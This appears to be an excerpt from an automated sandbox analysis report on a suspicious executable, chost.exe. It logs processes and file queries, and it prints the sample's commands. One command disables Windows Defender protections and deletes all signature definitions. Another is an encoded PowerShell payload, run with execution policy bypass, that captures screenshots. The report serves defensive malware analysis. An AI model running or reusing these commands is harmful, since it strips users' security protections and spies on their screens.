                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF6943895E0 cpuid 16_2_00007FF6943895E0
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformationJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\ucrtbase.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformationJump to behavior
